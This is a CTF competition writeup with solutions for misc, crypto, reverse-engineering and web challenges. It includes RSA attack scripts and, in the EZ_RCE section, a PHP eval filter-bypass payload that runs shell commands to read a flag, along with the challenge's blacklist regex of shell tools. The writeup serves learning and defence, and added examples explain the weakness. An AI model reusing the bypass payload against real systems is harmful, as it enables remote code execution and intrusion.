2024 University Alliance CTF Cup Writeup

2024 University Alliance CTF Cup

Official writeup

📎wp.pdf

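Summary

Personal results

The challenges were genuinely at the level of a freshman competition.

Crypto: I could still put in more effort.

PWN: I really can't do any of it.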

MISC

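zip family (solved)

📎zip.zip

Decode the Base32.

This gives yunfanNSN as the password.

This yields the second hint: the zip password is 8 characters long, so brute-force it directly.

The last zip is pseudo-encrypted; after repairing it, extract it to get the flag.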
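The pseudo-encryption repair from the last step, as an added example that is not part of the original writeup: the "encrypted" bit (bit 0 of the general-purpose flag word) is set although the data was never encrypted, so clearing it in the central and local headers makes the archive readable again. The sample archive is constructed in memory, and Zip64 archives are assumed not to occur.

```python
import io
import struct
import zipfile
import zlib

ENCRYPTED = 0x0001  # bit 0 of the general-purpose flag word

def patch_flags(data, set_bit):
    """Set or clear the 'encrypted' bit in every central and local header."""
    buf = bytearray(data)
    eocd = buf.rfind(b"PK\x05\x06")  # end-of-central-directory record
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, _size, pos = struct.unpack_from("<HII", buf, eocd + 10)
    for _ in range(count):
        if buf[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        # name/extra/comment lengths at +28, local header offset at +42
        name, extra, comment, local = struct.unpack_from("<HHH8xI", buf, pos + 28)
        for off in (pos + 8, local + 6):  # flag word: central, then local
            (flags,) = struct.unpack_from("<H", buf, off)
            flags = flags | ENCRYPTED if set_bit else flags & ~ENCRYPTED
            struct.pack_into("<H", buf, off, flags)
        pos += 46 + name + extra + comment
    return bytes(buf)

def try_read(data, member):
    """Return the member's bytes, or None if zipfile demands a password."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.read(member)
    except RuntimeError:
        return None

def is_pseudo_encrypted(data):
    """True if entries are flagged encrypted but pass CRC once the bit is cleared."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if not any(i.flag_bits & ENCRYPTED for i in zf.infolist()):
            return False
    try:
        with zipfile.ZipFile(io.BytesIO(patch_flags(data, False))) as zf:
            return zf.testzip() is None
    except (zipfile.BadZipFile, zlib.error):
        return False

def make_sample():  # constructed sample: a plain archive with the bit forced on
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("flag.txt", b"flag{constructed-sample}")
    return patch_flags(out.getvalue(), True)
```

A genuinely encrypted archive fails the CRC check after the bit is cleared, so `is_pseudo_encrypted` returns False for it and the password still has to be recovered.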

I have an 8 a.m. class (solved)

📎zao8.zip

This gives an image.

Open it in 010 Editor.

The data is hidden at the end of the file.

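Can't see me (solved)

📎aaa.zip

This gives an animated GIF in which letters are visible.

They cannot be read clearly.

Split the GIF into individual frames.

This gives the flag.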

I'm not a simp (solved)

If the downloaded file cannot be extracted, just rename it to 1.zip.

📎tg.zip

This gives an image, plus an Easter egg.

Search Baidu for transcendence resort.

青城山心越温泉度假酒店

Bot(solved)

📎robo.mp3

Original challenge:

https://blog.csdn.net/LingDIHong/article/details/112616336

An unconventional Morse code: b and bo correspond to 1 and 0.

1 represents short, 0 represents long.

1111 1 1011 1011 000 100 1111 10 0 11 111 0 1111 1 010 1 0100 11 0 11 111 0111 000 000 1001 0111 1 1 1001

HELLOWHATISTHEKEYITISBOOPBEEP

BOOPBEEP is the flag.

CRYPTO

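Pay attention and look down (solved)

Challenge description: the plaintext corresponding to the ciphertext in the txt is a meaningful sentence.

Contents

MMZFM3KZPFBHAT2YIJZUSSCRGJSFOZ3HMFKGY53CINBDKTRSNRYUSR3UOZHXSNDHMFKGY53CINBGUWTNMRUUSSDDPJRW2ULHMRKGQ5TBPFBHSTSYNRXA====

https://gchq.github.io/CyberChef/

Decoding gives some words; are they meant to be joined together?

The title says to look down: four characters surround one letter, so this is a keyboard-surround cipher.

Tool used:

I was stuck for a long time; one still shouldn't rely on tools too much.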

sefc -> D

i9pl -> O

t6uh -> Y

i9pl -> O

y7ij -> U

ko;. -> L

i9pl -> O

cfgb -> V

w3rd -> E

u8ok -> I

r5yg -> T
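The keyboard-surround decoding above, done without a tool. This is an added example, not part of the original writeup; it assumes a standard staggered QWERTY layout in which each row sits half a key to the right of the row above it.

```python
# QWERTY rows, top to bottom (assumed layout; each row is shifted half a key right).
ROWS = ["1234567890", "qwertyuiop", "asdfghjkl;", "zxcvbnm,./"]


def neighbours(row, col):
    """Keys touching ROWS[row][col] on the staggered layout."""
    spots = [(row, col - 1), (row, col + 1),      # left, right
             (row - 1, col), (row - 1, col + 1),  # upper-left, upper-right
             (row + 1, col - 1), (row + 1, col)]  # lower-left, lower-right
    return {ROWS[r][c] for r, c in spots
            if 0 <= r < len(ROWS) and 0 <= c < len(ROWS[r])}


def enclosed_key(group):
    """Return the single key that every character of `group` touches."""
    wanted = set(group.lower())
    hits = [ROWS[r][c]
            for r in range(len(ROWS)) for c in range(len(ROWS[r]))
            if wanted <= neighbours(r, c)]
    if len(hits) != 1:
        raise ValueError(f"{group!r}: expected one enclosed key, found {hits}")
    return hits[0].upper()


def decode(text):
    """Decode whitespace-separated groups of surrounding keys."""
    return "".join(enclosed_key(g) for g in text.split())


# The eleven groups listed in the writeup above.
GROUPS = "sefc i9pl t6uh i9pl y7ij ko;. i9pl cfgb w3rd u8ok r5yg"

if __name__ == "__main__":
    print(decode(GROUPS))
```

A group that fits more than one key (or none) raises ValueError instead of guessing.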

EasyMat (solved)

📎task3.py

Chinese Remainder Theorem

Handed it to ChatGPT 3.5

```python
from gmpy2 import invert

# Known n_list and c_list
n_list = [
    81022657497308917969440684455145361573258269186878343256413341687865068279323,
    75913631015555672023140997922512551778987578704176071271327334667287271062597,
    94127642320478528456768535561236654642699719015872768666777965304146058015581,
    100067712121597104573152904878420393099718538392909527587227523052894062123273,
    85207018801137566782246500192695012724716098679652747885928950108181526448731,
    68062329770946647518875573914993880337430423210091356973352823810594223874279,
    97699132294281356807847058676444981641305119290874008718563253238741574493837,
    61964572830584557031631040358095731422357283653378273091543796652706730631753,
    105683433672193206747660489641266125023791083682987405305773324591115031496137,
    79409884513398319288102524631881088584154247050400489568179752853269260093899
]
c_list = [
    45265534758635258924325213125398605986800260408324458503575189195463010393615,
    12715074081092548766845794404913905983264472096042530328780531271103011520980,
    39140990597389311763264588051575388948778417314351644652781499410482069603306,
    76859345232346098524189772378621697847643153634405461255220957857908705865866,
    50422665384999138646319717291100929446583783934985038765690638359418199518261,
    448260554014950676172503176435439996507332612869507730554636929807845878262,
    11722992963028416365689373876553619277636897652000568840711756661567110676728,
    50228862527061065845819628079049107970736159720918650038834584407321617394070,
    77039544410906182205985046562127955618012574958894998445318963646090729861358,
    13230864747695729204181737413018408094825854953781811869710750475321879661987
]

# Compute N, the product of all n
N = 1
for n in n_list:
    N *= n

# Solve with the Chinese Remainder Theorem
M = 0
for n, c in zip(n_list, c_list):
    Ni = N // n
    yi = invert(Ni, n)
    M += c * yi * Ni

# M mod N is the plaintext m; convert it to a Python int, then to a byte string
m = int(M % N)
flag_bytes = m.to_bytes((m.bit_length() + 7) // 8, byteorder='big')

# Try to decode the flag
try:
    flag = flag_bytes.decode('utf-8')
    print("Decrypted flag:", flag)
except UnicodeDecodeError:
    print("Decrypted flag bytes:", flag_bytes)
```

Small is cute too (solved)

📎task2.py

Low public exponent attack

exp:

```python
from gmpy2 import iroot
from Crypto.Util.number import long_to_bytes

e = 3
c1 = 50693458449321936643002876350314571645483492898191488807231069919804643711069939947465500707751785291672584591666301916695212050174966310675882616625445835779080300345273253975477238447343967750619181738366040673523401544337748601129397554949157167078117809209674480735419596253142185617437157135028553535512
c2 = 68461554119116371147083386089552453735288867510520424213313079173741578139398748933397803590044864350237794073221482820153815072204593815103202302010872607529891174985131560381897122890186935183835887957097497249844470290572296180422540319205795848739267567991676339111284811461432510119947371569758485318185

n = 90544490827178754252962187794189026539597459100491154117742894089808204642960698141161214308791144141515252335630103490253410291789147112970571180845809176325505586392652118182228127519560532500789505277117619230772726766104579482737300391555520381632519494166348010918044038023332622630156514379058214998761


def small_e_root(c):
    # m**e = c + k*n for some small k >= 0; search k from 0 for each ciphertext
    k = 0
    while True:
        root, exact = iroot(c + k * n, e)
        if exact:
            return int(root)
        k += 1


m1 = small_e_root(c1)
m2 = small_e_root(c2)
print(long_to_bytes(m1) + long_to_bytes(m2))
```

What is this gibberish? (solved)

📎1.txt

Vigenère decryption

https://www.guballa.de/vigenere-solver

Learning cryptography can help people understand and solve these information security problems, so as to better apply in modern information technology. Cryptography technology can meet the basic needs of information security, including identity, authentication, authorization, confidentiality, integrity and availability of information. The security of the system can be improved by the comprehensive application of symmetric cryptography, unidirectional hash function and asymmetric cryptography.

The Caesar cipher is the earliest substitution cipher, using a single column list. The basic idea is to encrypt and decrypt letters by moving a certain number of numbers. All letters in plaintext are moved backward (or forward) by a fixed number in the alphabet and replaced with ciphertext. oh, What is this.[118,136, 116, 134, 121, 143, 110, 133, 140, 56, 127, 137, 144, 138, 129, 62, 147, 136, 134, 66, 147, 133, 153, 154, 140, 154, 151, 167] I think we found a different Caesar code here.

exp:

```python
s = 'gxctf'
l = [118, 136, 116, 134, 121, 143, 110, 133, 140, 56, 127, 137, 144, 138,
     129, 62, 147, 136, 134, 66, 147, 133, 153, 154, 140, 154, 151, 167]
# Recover the shift from the known flag prefix:
# for i in range(len(s)):
#     diff = ord(s[i]) - l[i]
#     print(diff)
# The shift starts at -15 and decreases by 1 for each character
diff = -15
flag = ''
for i in range(len(l)):
    flag += chr(l[i] + diff)
    diff -= 1
print(flag)
```

EasyRSA (solved)

dp leak

```python
import gmpy2
from Crypto.Util.number import long_to_bytes, inverse

c = 44444088579666157621732553943670430273576254061474213939712213538406543268662965919310579281902129974974046495922523312658382899557387672355450391484977282423472695576509879204127236418710160228430907224557292043782574207980810012206965736060860845936702829630053500914689948188515065224954864332115028989648
n = 95383564587813903117264084370022798249408254695230018220531107804252937201014457059104201100944471086733795699882077502065034228927715000188417929139360620710897717662055202785483254232630518067785695466739940287445629280210950586820508333226251375040583347752697965543942500565891055165003961304756911395473
dp = 9124290354916175097961830868157352750253514515485171416231465524792780467304908803146834645823716115169328517501242615875895945850599189429277137939616265
e = 746129341247492452183022302843191577
a = 7

# Compute p with gmpy2.gcd: e*dp ≡ 1 (mod p-1), so a^(e*dp) ≡ a (mod p)
# and gcd(a^(e*dp) - a, n) yields p
p = int(gmpy2.gcd(gmpy2.powmod(a, e * dp, n) - a, n))
q = n // p

# Compute d with Crypto.Util.number.inverse
d = inverse(e, (p - 1) * (q - 1))

# Decrypt the ciphertext
m = pow(c, d, n)

# Convert the plaintext to bytes
print(long_to_bytes(m))
```


RE

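pycc check-in (solved)

📎pycc签个到.zip

The archive contains a .pyc file; decompile it with the following site:

https://tool.lu/pyc/

Follow the official account to get the four flag fragments, then join them together.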

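Just__upx+xor (solved)

📎Just__upxxor .zip

The challenge name mentions upx and xor.

The archive contains an exe; unpack it with upx.

Then load it into IDA and decompile.

The ciphertext is gm`fzVdmb1ld^u1^Fhojf1^bug|

  1. Length check: the first for loop examines the first 27 bytes of the memory region pointed to by a1. If a null byte ('\0') is encountered before those 27 bytes are consumed, the loop terminates early. If a null byte is found but not at the 27th byte, the function prints the "Error length!" message, pauses execution, and exits.

  2. Content verification: the second for loop iterates over the same 27 bytes and verifies that each byte equals a2 XORed bitwise with the corresponding byte pointed to by a3. If any byte does not match, the function prints the "Error flag!" message, pauses execution, and exits.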

```python
# Undo the single-byte XOR applied to the stored ciphertext
known_str = "gm`fzVdmb1ld^u1^Fhojf1^bug|"
xor_value = 1
flag = ""
for char in known_str:
    flag += chr(ord(char) ^ xor_value)

print(flag)
```

F5 check-in again? (solved)

📎f5又签到.zip

As the challenge description says:

Please analyze the attached binary file with IDA.

Open it in IDA.

Press F5 to get the flag.

WEB

JS Challenge(solved)

White-box code audit

📎index.html

The JS code is URL-encoded.

URL-decode it:

```javascript
function CaidaoCheck()
{
    var MyPass = document.getElementById('Incantation').value;
    // The input must be the canonical decimal form of an integer
    if(""+parseInt(MyPass) == MyPass)
    {
        if(parseInt(MyPass)+7979886==10000000)
        {
            // "Revival succeeded! The KEY is the 32-character MD5 of the revival incantation!"
            alert('复活成功!KEY就是复活咒语的32位md5值!');
        }else{
            // "Revival failed! Please re-enter the revival incantation"
            alert('复活失败!请重新输入复活咒语');
            document.Get_Key.Incantation.value = '';
        }
    }else{
        alert('复活失败!请重新输入复活咒语');
        document.Get_Key.Incantation.value = '';
    }
}
```


The key part:

```javascript
if(parseInt(MyPass)+7979886==10000000)
{
    alert('复活成功!KEY就是复活咒语的32位md5值!');
}
```

parseInt(MyPass) is 2020114.

The flag is the 32-character MD5 value of the KEY.

Where is the Great Sage? (solved)

View the page source directly.

Visit Wuuuuuukong.php.

Do you even know what passing parameters means? (solved)

```php
<?php
highlight_file('index.php');
include("flag.php");
$nsn = $_POST['nsn'];
$hbu = $_GET['hbu'];
if ($nsn == "never say never" && $hbu == "never say no") {
    echo $flag;
}
?> get out!!
```

Simple GET and POST parameter passing.

Black Hand (solved)

Looking at the code with F12 gave no ideas.

So start scanning directories right away.

Visit /robots.txt.

Visit the PHP file to get the flag.

EZ_RCE(solved)

```php
<?php

error_reporting(0);

if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];

    if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
        die("fk you hacker!");
    } else {
        eval($cmd);
    }
} else {
    highlight_file(__FILE__);
}
?>
```

RCE bypass

preg_match

The regex filters /flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[|&><]|eval|system|exec|popen|shell_exec/i

system, the space character and cat are all filtered out.

Build system by string concatenation.

Use $IFS in place of the space.

Use tac in place of cat.

https://www.freebuf.com/articles/web/261049.html

Payload:

http://218.31.44.233:16662/?cmd=$a='sy'.'stem';$a('pwd;cd$IFS/;tac%09f*;');
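Why the keyword blacklist fails and what a safer design looks like, as an added example that is not part of the original writeup or the challenge code. It reuses the challenge's regex in Python and checks it against the writeup's own payload; the `ACTIONS` table and its handlers are hypothetical.

```python
import re
from urllib.parse import unquote

# The alternation from the challenge's preg_match() call, case-insensitive (/i).
BLACKLIST = re.compile(
    r"flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]"
    r"|eval|system|exec|popen|shell_exec",
    re.IGNORECASE,
)


def blacklist_blocks(cmd):
    """Mirror of the vulnerable check: True means the request is rejected."""
    return BLACKLIST.search(cmd) is not None


# Hardened shape (hypothetical handlers): the request only selects a fixed,
# named action; request text is never evaluated as code.
ACTIONS = {
    "time": lambda: "2024-01-01T00:00:00Z (constructed)",
    "version": lambda: "demo-1.0 (constructed)",
}


def allowlist_accepts(action):
    """True only for an exact, pre-registered action name."""
    return action in ACTIONS


def dispatch(action):
    """Run a registered action; anything else is refused outright."""
    if not allowlist_accepts(action):
        raise PermissionError(f"unknown action: {action!r}")
    return ACTIONS[action]()


# Value of cmd from the writeup's payload, URL-decoded the way PHP fills $_GET.
PAGE_PAYLOAD = unquote("$a='sy'.'stem';$a('pwd;cd$IFS/;tac%09f*;');")
# Constructed: the direct form that the filter was written to stop.
DIRECT_CALL = "system('cat /flag');"

if __name__ == "__main__":
    for label, cmd in (("direct", DIRECT_CALL), ("writeup payload", PAGE_PAYLOAD)):
        print(label, "| blacklist rejects:", blacklist_blocks(cmd),
              "| allowlist accepts:", allowlist_accepts(cmd))
```

The blacklist matches text, while `eval` executes whatever the text evaluates to, so any spelling the pattern did not anticipate gets through; the allowlist never evaluates the input at all.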